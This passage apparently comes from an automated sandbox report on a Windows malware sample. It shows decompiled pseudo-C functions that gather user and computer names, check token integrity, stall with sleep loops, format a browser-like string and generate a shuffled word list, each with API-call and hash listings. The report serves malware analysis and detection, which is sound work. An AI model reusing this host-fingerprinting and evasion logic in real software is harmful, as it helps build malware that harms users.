                                                          								 *_t69 =  *_t69 ^ E02B97306(_v8 + _v8, _t64);
                                                          							}
                                                          							HeapFree( *0x2b9d238, 0, _t62);
                                                          						}
                                                          					}
                                                          				}
                                                          				_t61 = __imp__;
                                                          				_v8 = _v8 & 0x00000000;
                                                          				GetComputerNameW(0,  &_v8);
                                                          				_t34 = _v8;
                                                          				if(_t34 != 0) {
                                                          					_t68 = RtlAllocateHeap( *0x2b9d238, 0, _t34 + _t34);
                                                          					if(_t68 != 0) {
                                                          						if(GetComputerNameW(_t68,  &_v8) != 0) {
                                                          							_t64 = _t68;
                                                          							 *(_t69 + 0xc) =  *(_t69 + 0xc) ^ E02B97306(_v8 + _v8, _t64);
                                                          						}
                                                          						HeapFree( *0x2b9d238, 0, _t68);
                                                          					}
                                                          				}
                                                          				asm("cpuid");
                                                          				_t67 =  &_v28;
                                                          				 *_t67 = 1;
                                                          				 *((intOrPtr*)(_t67 + 4)) = _t61;
                                                          				 *((intOrPtr*)(_t67 + 8)) = 0;
                                                          				 *(_t67 + 0xc) = _t64;
                                                          				_t39 = _v16 ^ _v20 ^ _v28;
                                                          				 *(_t69 + 4) =  *(_t69 + 4) ^ _t39;
                                                          				return _t39;
                                                          			}




















                                                          APIs
                                                          • GetUserNameW.ADVAPI32(00000000,?), ref: 02B9916C
                                                          • RtlAllocateHeap.NTDLL(00000000,?), ref: 02B99183
                                                          • GetUserNameW.ADVAPI32(00000000,?), ref: 02B99190
                                                          • HeapFree.KERNEL32(00000000,00000000,?,?,?,?,02B95D20), ref: 02B991B1
                                                          • GetComputerNameW.KERNEL32(00000000,00000000), ref: 02B991D8
                                                          • RtlAllocateHeap.NTDLL(00000000,00000000), ref: 02B991EC
                                                          • GetComputerNameW.KERNEL32(00000000,00000000), ref: 02B991F9
                                                          • HeapFree.KERNEL32(00000000,00000000,?,?,?,?,02B95D20), ref: 02B99217
                                                          Memory Dump Source
                                                          • Source File: 00000023.00000002.390282445.0000000002B91000.00000020.00000001.sdmp, Offset: 02B90000, based on PE: true
                                                          • Associated: 00000023.00000002.390249117.0000000002B90000.00000004.00000001.sdmp
                                                          • Associated: 00000023.00000002.390318241.0000000002B9C000.00000002.00000001.sdmp
                                                          • Associated: 00000023.00000002.390350228.0000000002B9D000.00000004.00000001.sdmp
                                                          • Associated: 00000023.00000002.390398092.0000000002B9F000.00000002.00000001.sdmp
                                                          Similarity
                                                          • API ID: HeapName$AllocateComputerFreeUser
                                                          • String ID:
                                                          • API String ID: 3239747167-0
                                                          • Opcode ID: 01aaa70df96fb1374811893907fd0d6cf32afc11807c73690d8ebdfd9ef9d196
                                                          • Instruction ID: 82188f61d9447466a1246232609b6793e56c8701ec48206b0de2c8232e621387
                                                          • Opcode Fuzzy Hash: 01aaa70df96fb1374811893907fd0d6cf32afc11807c73690d8ebdfd9ef9d196
                                                          • Instruction Fuzzy Hash: BD311871A40606EFDB10EFA9D980A6EF7F9FB48244F1184B9E544D7210D730EA519B10
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 100%
                                                          			E02B91A08(long* _a4) {
                                                          				long _v8;
                                                          				void* _v12;
                                                          				void _v16;
                                                          				long _v20;
                                                          				int _t33;
                                                          				void* _t46;
                                                          
                                                          				_v16 = 1;
                                                          				_v20 = 0x2000;
                                                          				if( *0x2b9d25c > 5) {
                                                          					_v16 = 0;
                                                          					if(OpenProcessToken(0xffffffff, 0x20008,  &_v12) != 0) {
                                                          						GetTokenInformation(_v12, 0x14,  &_v16, 4,  &_v8); // executed
                                                          						_v8 = 0;
                                                          						GetTokenInformation(_v12, 0x19, 0, 0,  &_v8); // executed
                                                          						if(_v8 != 0) {
                                                          							_t46 = E02B9A71F(_v8);
                                                          							if(_t46 != 0) {
                                                          								_t33 = GetTokenInformation(_v12, 0x19, _t46, _v8,  &_v8); // executed
                                                          								if(_t33 != 0) {
                                                          									_v20 =  *(GetSidSubAuthority( *_t46,  *(GetSidSubAuthorityCount( *_t46)) - 0x00000001 & 0x000000ff));
                                                          								}
                                                          								E02B9A734(_t46);
                                                          							}
                                                          						}
                                                          						CloseHandle(_v12);
                                                          					}
                                                          				}
                                                          				 *_a4 = _v20;
                                                          				return _v16;
                                                          			}










                                                          APIs
                                                          • OpenProcessToken.ADVAPI32(000000FF,00020008,00000000,00000000), ref: 02B91A3A
                                                          • GetTokenInformation.KERNELBASE(00000000,00000014(TokenIntegrityLevel),00000001,00000004,?,00000000), ref: 02B91A5A
                                                          • GetTokenInformation.KERNELBASE(00000000,00000019(TokenIntegrityLevel),00000000,00000000,?), ref: 02B91A6A
                                                          • CloseHandle.KERNEL32(00000000), ref: 02B91ABA
                                                            • Part of subcall function 02B9A71F: RtlAllocateHeap.NTDLL(00000000,00000000,02B95595), ref: 02B9A72B
                                                          • GetTokenInformation.KERNELBASE(00000000,00000019(TokenIntegrityLevel),00000000,?,?,?,?), ref: 02B91A8D
                                                          • GetSidSubAuthorityCount.ADVAPI32(00000000), ref: 02B91A95
                                                          • GetSidSubAuthority.ADVAPI32(00000000,?), ref: 02B91AA5
                                                          Memory Dump Source
                                                          • Source File: 00000023.00000002.390282445.0000000002B91000.00000020.00000001.sdmp, Offset: 02B90000, based on PE: true
                                                          • Associated: 00000023.00000002.390249117.0000000002B90000.00000004.00000001.sdmp
                                                          • Associated: 00000023.00000002.390318241.0000000002B9C000.00000002.00000001.sdmp
                                                          • Associated: 00000023.00000002.390350228.0000000002B9D000.00000004.00000001.sdmp
                                                          • Associated: 00000023.00000002.390398092.0000000002B9F000.00000002.00000001.sdmp
                                                          Similarity
                                                          • API ID: Token$Information$Authority$AllocateCloseCountHandleHeapOpenProcess
                                                          • String ID:
                                                          • API String ID: 1295030180-0
                                                          • Opcode ID: bc91b79300810c433e037bf481c481842b2892bfbbc6968f8e3bcf9686a11d41
                                                          • Instruction ID: bb81818ef07ac291c39bf07627885dacda5ceb6d9552008df21f128456a5fa66
                                                          • Opcode Fuzzy Hash: bc91b79300810c433e037bf481c481842b2892bfbbc6968f8e3bcf9686a11d41
                                                          • Instruction Fuzzy Hash: 01214A7594024AFFEF00EFA5DD84EAEBBB9EB08344F0041A6E920A7150C7719E15EF60
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • SysAllocString.OLEAUT32(?), ref: 02B9395A
                                                          • IUnknown_QueryInterface_Proxy.RPCRT4(?,332C4425,?), ref: 02B939DD
                                                          • StrStrIW.SHLWAPI(00000000,006E0069), ref: 02B93A1D
                                                          • SysFreeString.OLEAUT32(00000000), ref: 02B93A3F
                                                            • Part of subcall function 02B96F3A: SysAllocString.OLEAUT32(02B9C290), ref: 02B96F8A
                                                          • SafeArrayDestroy.OLEAUT32(00000000), ref: 02B93A92
                                                          • SysFreeString.OLEAUT32(00000000), ref: 02B93AA1
                                                            • Part of subcall function 02B91AE2: Sleep.KERNELBASE(000001F4), ref: 02B91B2A
                                                          Memory Dump Source
                                                          • Source File: 00000023.00000002.390282445.0000000002B91000.00000020.00000001.sdmp, Offset: 02B90000, based on PE: true
                                                          • Associated: 00000023.00000002.390249117.0000000002B90000.00000004.00000001.sdmp
                                                          • Associated: 00000023.00000002.390318241.0000000002B9C000.00000002.00000001.sdmp
                                                          • Associated: 00000023.00000002.390350228.0000000002B9D000.00000004.00000001.sdmp
                                                          • Associated: 00000023.00000002.390398092.0000000002B9F000.00000002.00000001.sdmp
                                                          Similarity
                                                          • API ID: String$AllocFree$ArrayDestroyInterface_ProxyQuerySafeSleepUnknown_
                                                          • String ID:
                                                          • API String ID: 2118684380-0
                                                          • Opcode ID: f5dce47f980f850ec91028fd524354a3b908b92d98fc4fa441b02749c01e70a6
                                                          • Instruction ID: 8988699295a0ecfb17feb5077831aaf01566d09bc5d45696902344e3739be551
                                                          • Opcode Fuzzy Hash: f5dce47f980f850ec91028fd524354a3b908b92d98fc4fa441b02749c01e70a6
                                                          • Instruction Fuzzy Hash: B6516F76900609EFDF01DFA8C844A9EB7BAFF88744F1588A9E515DB220DB31ED05CB60
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 74%
                                                          			E02B912E5(void* __ecx, void* __edx, intOrPtr _a4) {
                                                          				struct _FILETIME _v12;
                                                          				void* _t10;
                                                          				void* _t12;
                                                          				int _t14;
                                                          				signed int _t16;
                                                          				void* _t18;
                                                          				signed int _t19;
                                                          				unsigned int _t23;
                                                          				void* _t26;
                                                          				signed int _t33;
                                                          
                                                          				_t26 = __edx;
                                                          				_push(__ecx);
                                                          				_push(__ecx);
                                                          				_t10 = HeapCreate(0, 0x400000, 0); // executed
                                                          				 *0x2b9d238 = _t10;
                                                          				if(_t10 != 0) {
                                                          					 *0x2b9d1a8 = GetTickCount();
                                                          					_t12 = E02B93E69(_a4);
                                                          					if(_t12 == 0) {
                                                          						do {
                                                          							GetSystemTimeAsFileTime( &_v12);
                                                          							_t14 = SwitchToThread();
                                                          							_t23 = _v12.dwHighDateTime;
                                                          							_t16 = (_t23 << 0x00000020 | _v12.dwLowDateTime) >> 7;
                                                          							_push(0);
                                                          							_push(9);
                                                          							_push(_t23 >> 7);
                                                          							_push(_t16);
                                                          							L02B9B08A();
                                                          							_t33 = _t14 + _t16;
                                                          							_t18 = E02B95548(_a4, _t33);
                                                          							_t19 = 2;
                                                          							_t25 = _t33;
                                                          							Sleep(_t19 << _t33); // executed
                                                          						} while (_t18 == 1);
                                                          						if(E02B94DA2(_t25) != 0) {
                                                          							 *0x2b9d260 = 1; // executed
                                                          						}
                                                          						_t12 = E02B95BA2(_t26); // executed
                                                          					}
                                                          				} else {
                                                          					_t12 = 8;
                                                          				}
                                                          				return _t12;
                                                          			}














                                                          APIs
                                                          • HeapCreate.KERNELBASE(00000000,00400000,00000000,?,00000001,?,?,?,02B94EF2,?), ref: 02B912F8
                                                          • GetTickCount.KERNEL32 ref: 02B9130C
                                                          • GetSystemTimeAsFileTime.KERNEL32(?,?,?,00000001,?,?,?,02B94EF2,?), ref: 02B91328
                                                          • SwitchToThread.KERNEL32(?,00000001,?,?,?,02B94EF2,?), ref: 02B9132E
                                                          • _aullrem.NTDLL(?,?,00000009,00000000), ref: 02B9134B
                                                          • Sleep.KERNELBASE(00000002,00000000,?,00000001,?,?,?,02B94EF2,?), ref: 02B91365
                                                          Memory Dump Source
                                                          • Source File: 00000023.00000002.390282445.0000000002B91000.00000020.00000001.sdmp, Offset: 02B90000, based on PE: true
                                                          • Associated: 00000023.00000002.390249117.0000000002B90000.00000004.00000001.sdmp
                                                          • Associated: 00000023.00000002.390318241.0000000002B9C000.00000002.00000001.sdmp
                                                          • Associated: 00000023.00000002.390350228.0000000002B9D000.00000004.00000001.sdmp
                                                          • Associated: 00000023.00000002.390398092.0000000002B9F000.00000002.00000001.sdmp
                                                          Similarity
                                                          • API ID: Time$CountCreateFileHeapSleepSwitchSystemThreadTick_aullrem
                                                          • String ID:
                                                          • API String ID: 507476733-0
                                                          • Opcode ID: 6a2534da38a4dd1caa40bb5a725e85acc6c24da27f5ce28fc786bca98d17a271
                                                          • Instruction ID: 85808f748f838477584075d6a547a5700f719e320adb911bd54ca1872438da00
                                                          • Opcode Fuzzy Hash: 6a2534da38a4dd1caa40bb5a725e85acc6c24da27f5ce28fc786bca98d17a271
                                                          • Instruction Fuzzy Hash: 7F11A972E943027FEF106B69DD09B5A7BE9EB48390F0049B6F949D7280EB70D4508B61
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 57%
                                                          			E02B95BA2(signed int __edx) {
                                                          				signed int _v8;
                                                          				long _v12;
                                                          				CHAR* _v16;
                                                          				long _v20;
                                                          				void* __edi;
                                                          				void* __esi;
                                                          				void* _t21;
                                                          				CHAR* _t22;
                                                          				CHAR* _t25;
                                                          				intOrPtr _t26;
                                                          				void* _t27;
                                                          				void* _t31;
                                                          				void* _t32;
                                                          				CHAR* _t36;
                                                          				CHAR* _t43;
                                                          				CHAR* _t44;
                                                          				void* _t49;
                                                          				void* _t51;
                                                          				CHAR* _t54;
                                                          				signed char _t56;
                                                          				intOrPtr _t58;
                                                          				signed int _t59;
                                                          				void* _t62;
                                                          				CHAR* _t65;
                                                          				CHAR* _t66;
                                                          				char* _t67;
                                                          				void* _t68;
                                                          
                                                          				_t61 = __edx;
                                                          				_v20 = 0;
                                                          				_v8 = 0;
                                                          				_v12 = 0;
                                                          				_t21 = E02B96C09();
                                                          				if(_t21 != 0) {
                                                          					_t59 =  *0x2b9d25c; // 0x4000000a
                                                          					_t55 = (_t59 & 0xf0000000) + _t21;
                                                          					 *0x2b9d25c = (_t59 & 0xf0000000) + _t21;
                                                          				}
                                                          				_t22 =  *0x2b9d160(0, 2);
                                                          				_v16 = _t22;
                                                          				if(_t22 == 0 || _t22 == 1 || _t22 == 0x80010106) {
                                                          					_t25 = E02B9496B( &_v8,  &_v20); // executed
                                                          					_t54 = _t25;
                                                          					_t26 =  *0x2b9d2a8; // 0x3e1a5a8
                                                          					if( *0x2b9d25c > 5) {
                                                          						_t8 = _t26 + 0x2b9e5cd; // 0x4d283a53
                                                          						_t27 = _t8;
                                                          					} else {
                                                          						_t7 = _t26 + 0x2b9e9f5; // 0x44283a44
                                                          						_t27 = _t7;
                                                          					}
                                                          					E02B9729A(_t27, _t27);
                                                          					_t31 = E02B9232F(_t61,  &_v20,  &_v12); // executed
                                                          					if(_t31 == 0) {
                                                          						CloseHandle(_v20);
                                                          					}
                                                          					_t62 = 5;
                                                          					if(_t54 != _t62) {
                                                          						 *0x2b9d270 =  *0x2b9d270 ^ 0x81bbe65d;
                                                          						_t32 = E02B9A71F(0x60);
                                                          						 *0x2b9d32c = _t32;
                                                          						__eflags = _t32;
                                                          						if(_t32 == 0) {
                                                          							_push(8);
                                                          							_pop(0);
                                                          						} else {
                                                          							memset(_t32, 0, 0x60);
                                                          							_t49 =  *0x2b9d32c; // 0x69b95b0
                                                          							_t68 = _t68 + 0xc;
                                                          							__imp__(_t49 + 0x40);
                                                          							_t51 =  *0x2b9d32c; // 0x69b95b0
                                                          							 *_t51 = 0x2b9e81a;
                                                          						}
                                                          						_t54 = 0;
                                                          						__eflags = 0;
                                                          						if(0 == 0) {
                                                          							_t36 = RtlAllocateHeap( *0x2b9d238, 0, 0x43);
                                                          							 *0x2b9d2c8 = _t36;
                                                          							__eflags = _t36;
                                                          							if(_t36 == 0) {
                                                          								_push(8);
                                                          								_pop(0);
                                                          							} else {
                                                          								_t56 =  *0x2b9d25c; // 0x4000000a
                                                          								_t61 = _t56 & 0x000000ff;
                                                          								_t58 =  *0x2b9d2a8; // 0x3e1a5a8
                                                          								_t13 = _t58 + 0x2b9e55a; // 0x697a6f4d
                                                          								_t55 = _t13;
                                                          								wsprintfA(_t36, _t13, _t56 & 0x000000ff, _t56 & 0x000000ff, 0x2b9c287);
                                                          							}
                                                          							_t54 = 0;
                                                          							__eflags = 0;
                                                          							if(0 == 0) {
                                                          								asm("sbb eax, eax");
                                                          								E02B99135( ~_v8 &  *0x2b9d270,  &E02B9D00C); // executed
                                                          								_t54 = E02B9888E(_t55);
                                                          								__eflags = _t54;
                                                          								if(_t54 != 0) {
                                                          									goto L30;
                                                          								}
                                                          								_t43 = E02B987AE(); // executed
                                                          								__eflags = _t43;
                                                          								if(_t43 != 0) {
                                                          									__eflags = _v8;
                                                          									_t65 = _v12;
                                                          									if(_v8 != 0) {
                                                          										L29:
                                                          										_t44 = E02B951B0(_t61, _t65, _v8); // executed
                                                          										_t54 = _t44;
                                                          										goto L30;
                                                          									}
                                                          									__eflags = _t65;
                                                          									if(__eflags == 0) {
                                                          										goto L30;
                                                          									}
                                                          									_t54 = E02B91C66(__eflags,  &(_t65[4]));
                                                          									__eflags = _t54;
                                                          									if(_t54 == 0) {
                                                          										goto L30;
                                                          									}
                                                          									goto L29;
                                                          								}
                                                          								_t54 = 8;
                                                          							}
                                                          						}
                                                          					} else {
                                                          						_t66 = _v12;
                                                          						if(_t66 == 0) {
                                                          							L30:
                                                          							if(_v16 == 0 || _v16 == 1) {
                                                          								 *0x2b9d15c();
                                                          							}
                                                          							goto L34;
                                                          						}
                                                          						_t67 =  &(_t66[4]);
                                                          						do {
                                                          						} while (E02B9A273(_t62, _t67, 0, 1) == 0x4c7);
                                                          					}
                                                          					goto L30;
                                                          				} else {
                                                          					_t54 = _t22;
                                                          					L34:
                                                          					return _t54;
                                                          				}
                                                          			}

                                                          APIs
                                                            • Part of subcall function 02B96C09: GetModuleHandleA.KERNEL32(4C44544E,00000000,02B95BBB,00000000,00000000), ref: 02B96C18
                                                          • CloseHandle.KERNEL32(?,?,?,4D283A53,?,?), ref: 02B95C38
                                                            • Part of subcall function 02B9A71F: RtlAllocateHeap.NTDLL(00000000,00000000,02B95595), ref: 02B9A72B
                                                          • memset.NTDLL ref: 02B95C87
                                                          • RtlInitializeCriticalSection.NTDLL(069B9570), ref: 02B95C98
                                                            • Part of subcall function 02B91C66: memset.NTDLL ref: 02B91C7B
                                                            • Part of subcall function 02B91C66: lstrlenW.KERNEL32(00000000,00410025,00000005,?,00000000), ref: 02B91CBD
                                                            • Part of subcall function 02B91C66: StrCmpNIW.SHLWAPI(00000000,00000000,00000000), ref: 02B91CC8
                                                          • RtlAllocateHeap.NTDLL(00000000,00000043,00000060), ref: 02B95CC3
                                                          • wsprintfA.USER32 ref: 02B95CF3
                                                          Memory Dump Source
                                                          • Source File: 00000023.00000002.390282445.0000000002B91000.00000020.00000001.sdmp, Offset: 02B90000, based on PE: true
                                                          • Associated: 00000023.00000002.390249117.0000000002B90000.00000004.00000001.sdmp
                                                          • Associated: 00000023.00000002.390318241.0000000002B9C000.00000002.00000001.sdmp
                                                          • Associated: 00000023.00000002.390350228.0000000002B9D000.00000004.00000001.sdmp
                                                          • Associated: 00000023.00000002.390398092.0000000002B9F000.00000002.00000001.sdmp
                                                          Similarity
                                                          • API ID: AllocateHandleHeapmemset$CloseCriticalInitializeModuleSectionlstrlenwsprintf
                                                          • String ID:
                                                          • API String ID: 4246211962-0
                                                          • Opcode ID: 9a7a1ad8b358656354973ffef7af097c384c0b39edd2897e498a221cceb2ab94
                                                          • Instruction ID: 6ee25eadcf35d4d3afefd8265c1cbc05ff6e59782b6099ebd058afeb6ef1d833
                                                          • Opcode Fuzzy Hash: 9a7a1ad8b358656354973ffef7af097c384c0b39edd2897e498a221cceb2ab94
                                                          • Instruction Fuzzy Hash: 0051D271E81229ABDF32ABB9D988F5E77B8EF08740F9448B6E501D7140E7709545CF90
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 22%
                                                          			E02B962DA(signed int __eax, signed int _a4, signed int _a8) {
                                                          				signed int _v8;
                                                          				signed int _v12;
                                                          				intOrPtr _v16;
                                                          				signed int _v20;
                                                          				intOrPtr _t81;
                                                          				char _t83;
                                                          				signed int _t90;
                                                          				signed int _t97;
                                                          				signed int _t99;
                                                          				char _t101;
                                                          				unsigned int _t102;
                                                          				intOrPtr _t103;
                                                          				char* _t107;
                                                          				signed int _t110;
                                                          				signed int _t113;
                                                          				signed int _t118;
                                                          				signed int _t122;
                                                          				intOrPtr _t124;
                                                          
                                                          				_t102 = _a8;
                                                          				_t118 = 0;
                                                          				_v20 = __eax;
                                                          				_t122 = (_t102 >> 2) + 1;
                                                          				_v8 = 0;
                                                          				_a8 = 0;
                                                          				_t81 = E02B9A71F(_t122 << 2);
                                                          				_v16 = _t81;
                                                          				if(_t81 == 0) {
                                                          					_push(8);
                                                          					_pop(0);
                                                          					L37:
                                                          					return 0;
                                                          				}
                                                          				_t107 = _a4;
                                                          				_a4 = _t102;
                                                          				_t113 = 0;
                                                          				while(1) {
                                                          					_t83 =  *_t107;
                                                          					if(_t83 == 0) {
                                                          						break;
                                                          					}
                                                          					if(_t83 == 0xd || _t83 == 0xa) {
                                                          						if(_t118 != 0) {
                                                          							if(_t118 > _v8) {
                                                          								_v8 = _t118;
                                                          							}
                                                          							_a8 = _a8 + 1;
                                                          							_t118 = 0;
                                                          						}
                                                          						 *_t107 = 0;
                                                          						goto L16;
                                                          					} else {
                                                          						if(_t118 != 0) {
                                                          							L10:
                                                          							_t118 = _t118 + 1;
                                                          							L16:
                                                          							_t107 = _t107 + 1;
                                                          							_t15 =  &_a4;
                                                          							 *_t15 = _a4 - 1;
                                                          							if( *_t15 != 0) {
                                                          								continue;
                                                          							}
                                                          							break;
                                                          						}
                                                          						if(_t113 == _t122) {
                                                          							L21:
                                                          							if(_a8 <= 0x20) {
                                                          								_push(0xb);
                                                          								L34:
                                                          								_pop(0);
                                                          								L35:
                                                          								E02B9A734(_v16);
                                                          								goto L37;
                                                          							}
                                                          							_t24 = _v8 + 5; // 0xcdd8d2f8
                                                          							_t103 = E02B9A71F((_v8 + _t24) * _a8 + 4);
                                                          							if(_t103 == 0) {
                                                          								_push(8);
                                                          								goto L34;
                                                          							}
                                                          							_t90 = _a8;
                                                          							_a4 = _a4 & 0x00000000;
                                                          							_v8 = _v8 & 0x00000000;
                                                          							_t124 = _t103 + _t90 * 4;
                                                          							if(_t90 <= 0) {
                                                          								L31:
                                                          								 *0x2b9d278 = _t103;
                                                          								goto L35;
                                                          							}
                                                          							do {
                                                          								_t110 = 0x3c6ef35f + _v20 * 0x19660d;
                                                          								_v20 = 0x3c6ef35f + _t110 * 0x19660d;
                                                          								__imp__(_t124,  *((intOrPtr*)(_v16 + _t110 % _a8 * 4)));
                                                          								__imp__(_t124,  *((intOrPtr*)(_v16 + _v20 % _a8 * 4)));
                                                          								_v12 = _v12 & 0x00000000;
                                                          								if(_a4 <= 0) {
                                                          									goto L30;
                                                          								} else {
                                                          									goto L26;
                                                          								}
                                                          								while(1) {
                                                          									L26:
                                                          									_t99 = _v12;
                                                          									__imp__( *((intOrPtr*)(_t103 + _t99 * 4)), _t124); // executed
                                                          									if(_t99 == 0) {
                                                          										break;
                                                          									}
                                                          									_v12 = _v12 + 1;
                                                          									if(_v12 < _a4) {
                                                          										continue;
                                                          									}
                                                          									goto L30;
                                                          								}
                                                          								_v8 = _v8 - 1;
                                                          								L30:
                                                          								_t97 = _a4;
                                                          								_a4 = _a4 + 1;
                                                          								 *((intOrPtr*)(_t103 + _t97 * 4)) = _t124;
                                                          								__imp__(_t124);
                                                          								_v8 = _v8 + 1;
                                                          								_t124 = _t124 + _t97 + 1;
                                                          							} while (_v8 < _a8);
                                                          							goto L31;
                                                          						}
                                                          						 *((intOrPtr*)(_v16 + _t113 * 4)) = _t107;
                                                          						_t101 = _t83;
                                                          						if(_t83 - 0x61 <= 0x19) {
                                                          							_t101 = _t101 - 0x20;
                                                          						}
                                                          						 *_t107 = _t101;
                                                          						_t113 = _t113 + 1;
                                                          						goto L10;
                                                          					}
                                                          				}
                                                          				if(_t118 != 0) {
                                                          					if(_t118 > _v8) {
                                                          						_v8 = _t118;
                                                          					}
                                                          					_a8 = _a8 + 1;
                                                          				}
                                                          				goto L21;
                                                          			}
                                                          0x02b9636d
                                                          0x02b9636d
                                                          0x00000000

                                                          APIs
                                                            • Part of subcall function 02B9A71F: RtlAllocateHeap.NTDLL(00000000,00000000,02B95595), ref: 02B9A72B
                                                          • lstrcpy.KERNEL32(63699BC4,00000020), ref: 02B963D7
                                                          • lstrcat.KERNEL32(63699BC4,00000020), ref: 02B963EC
                                                          • lstrcmp.KERNEL32(00000000,63699BC4), ref: 02B96403
                                                          • lstrlen.KERNEL32(63699BC4), ref: 02B96427
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000023.00000002.390282445.0000000002B91000.00000020.00000001.sdmp, Offset: 02B90000, based on PE: true
                                                          • Associated: 00000023.00000002.390249117.0000000002B90000.00000004.00000001.sdmp
                                                          • Associated: 00000023.00000002.390318241.0000000002B9C000.00000002.00000001.sdmp
                                                          • Associated: 00000023.00000002.390350228.0000000002B9D000.00000004.00000001.sdmp
                                                          • Associated: 00000023.00000002.390398092.0000000002B9F000.00000002.00000001.sdmp
                                                          Similarity
                                                          • API ID: AllocateHeaplstrcatlstrcmplstrcpylstrlen
                                                          • String ID:
                                                          • API String ID: 3214092121-3916222277
                                                          • Opcode ID: 4639b51a01e98bffe06f1652515a9edde5552fe6c6e63fe26aef0ff5ba80e8e9
                                                          • Instruction ID: 587b081994b47c635083dd2d395d48dfd94ec4b1d405f8edddde975758292a6b
                                                          • Opcode Fuzzy Hash: 4639b51a01e98bffe06f1652515a9edde5552fe6c6e63fe26aef0ff5ba80e8e9
                                                          • Instruction Fuzzy Hash: 4D51DF71A04208EFDF20CF99C5857ADBBBAFF45354F19C0BAE8259B205C730AA51CB80
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 78%
                                                          			E02B96545(intOrPtr* __eax, void** _a4, intOrPtr* _a8) {
                                                          				intOrPtr _v8;
                                                          				void* _v12;
                                                          				void* _v16;
                                                          				intOrPtr _t26;
                                                          				intOrPtr* _t28;
                                                          				intOrPtr _t31;
                                                          				intOrPtr* _t32;
                                                          				void* _t39;
                                                          				int _t46;
                                                          				intOrPtr* _t47;
                                                          				int _t48;
                                                          
                                                          				_t47 = __eax;
                                                          				_push( &_v12);
                                                          				_push(__eax);
                                                          				_t39 = 0;
                                                          				_t46 = 0; // executed
                                                          				_t26 =  *((intOrPtr*)( *__eax + 0x24))();
                                                          				_v8 = _t26;
                                                          				if(_t26 < 0) {
                                                          					L13:
                                                          					return _v8;
                                                          				}
                                                          				if(_v12 == 0) {
                                                          					Sleep(0xc8);
                                                          					_v8 =  *((intOrPtr*)( *_t47 + 0x24))(_t47,  &_v12);
                                                          				}
                                                          				if(_v8 >= _t39) {
                                                          					_t28 = _v12;
                                                          					if(_t28 != 0) {
                                                          						_t31 =  *((intOrPtr*)( *_t28 + 0x100))(_t28,  &_v16);
                                                          						_v8 = _t31;
                                                          						if(_t31 >= 0) {
                                                          							_t46 = lstrlenW(_v16);
                                                          							if(_t46 != 0) {
                                                          								_t46 = _t46 + 1;
                                                          								_t48 = _t46 + _t46;
                                                          								_t39 = E02B9A71F(_t48);
                                                          								if(_t39 == 0) {
                                                          									_v8 = 0x8007000e;
                                                          								} else {
                                                          									memcpy(_t39, _v16, _t48);
                                                          								}
                                                          								__imp__#6(_v16);
                                                          							}
                                                          						}
                                                          						_t32 = _v12;
                                                          						 *((intOrPtr*)( *_t32 + 8))(_t32);
                                                          					}
                                                          					 *_a4 = _t39;
                                                          					 *_a8 = _t46 + _t46;
                                                          				}
                                                          				goto L13;
                                                          			}















                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000023.00000002.390282445.0000000002B91000.00000020.00000001.sdmp, Offset: 02B90000, based on PE: true
                                                          • Associated: 00000023.00000002.390249117.0000000002B90000.00000004.00000001.sdmp
                                                          • Associated: 00000023.00000002.390318241.0000000002B9C000.00000002.00000001.sdmp
                                                          • Associated: 00000023.00000002.390350228.0000000002B9D000.00000004.00000001.sdmp
                                                          • Associated: 00000023.00000002.390398092.0000000002B9F000.00000002.00000001.sdmp
                                                          Similarity
                                                          • API ID: FreeSleepStringlstrlenmemcpy
                                                          • String ID:
                                                          • API String ID: 1198164300-0
                                                          • Opcode ID: 2abb05a7458973c0b6aad9d26b8295e6b140f210e721b25eadac97390100aad1
                                                          • Instruction ID: 7155d7f00649fa6f54d71514f09ebc29f6e9582ebaffdf8c04e7d5cd848f07e2
                                                          • Opcode Fuzzy Hash: 2abb05a7458973c0b6aad9d26b8295e6b140f210e721b25eadac97390100aad1
                                                          • Instruction Fuzzy Hash: FD213075900209FFCF11DFA8C98499EBBB9FF48344B1041BAE906D7215EB30DA01CB60
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 100%
                                                          			E02B98D14(void* __edx) {
                                                          				void* _v8;
                                                          				int _v12;
                                                          				WCHAR* _v16;
                                                          				void* __edi;
                                                          				void* __esi;
                                                          				void* _t23;
                                                          				intOrPtr _t24;
                                                          				intOrPtr _t32;
                                                          				intOrPtr _t35;
                                                          				intOrPtr _t38;
                                                          				intOrPtr _t42;
                                                          				void* _t45;
                                                          				void* _t50;
                                                          				void* _t52;
                                                          
                                                          				_t50 = __edx;
                                                          				_v12 = 0;
                                                          				_t23 = E02B9A2F9(0,  &_v8); // executed
                                                          				if(_t23 != 0) {
                                                          					_v8 = 0;
                                                          				}
                                                          				_t24 =  *0x2b9d2a8; // 0x3e1a5a8
                                                          				_t4 = _t24 + 0x2b9edc0; // 0x69b9368
                                                          				_t5 = _t24 + 0x2b9ed68; // 0x4f0053
                                                          				_t45 = E02B95356( &_v16, _v8, _t5, _t4);
                                                          				if(_t45 == 0) {
                                                          					StrToIntExW(_v16, 0,  &_v12);
                                                          					_t45 = 8;
                                                          					if(_v12 < _t45) {
                                                          						_t45 = 1;
                                                          						__eflags = 1;
                                                          					} else {
                                                          						_t32 =  *0x2b9d2a8; // 0x3e1a5a8
                                                          						_t11 = _t32 + 0x2b9edb4; // 0x69b935c
                                                          						_t48 = _t11;
                                                          						_t12 = _t32 + 0x2b9ed68; // 0x4f0053
                                                          						_t52 = E02B945C6(_t11, _t12, _t11);
                                                          						_t59 = _t52;
                                                          						if(_t52 != 0) {
                                                          							_t35 =  *0x2b9d2a8; // 0x3e1a5a8
                                                          							_t13 = _t35 + 0x2b9edfe; // 0x30314549
                                                          							if(E02B98E27(_t48, _t50, _t59, _v8, _t52, _t13, 0x14) == 0) {
                                                          								_t61 =  *0x2b9d25c - 6;
                                                          								if( *0x2b9d25c <= 6) {
                                                          									_t42 =  *0x2b9d2a8; // 0x3e1a5a8
                                                          									_t15 = _t42 + 0x2b9ec0a; // 0x52384549
                                                          									E02B98E27(_t48, _t50, _t61, _v8, _t52, _t15, 0x13);
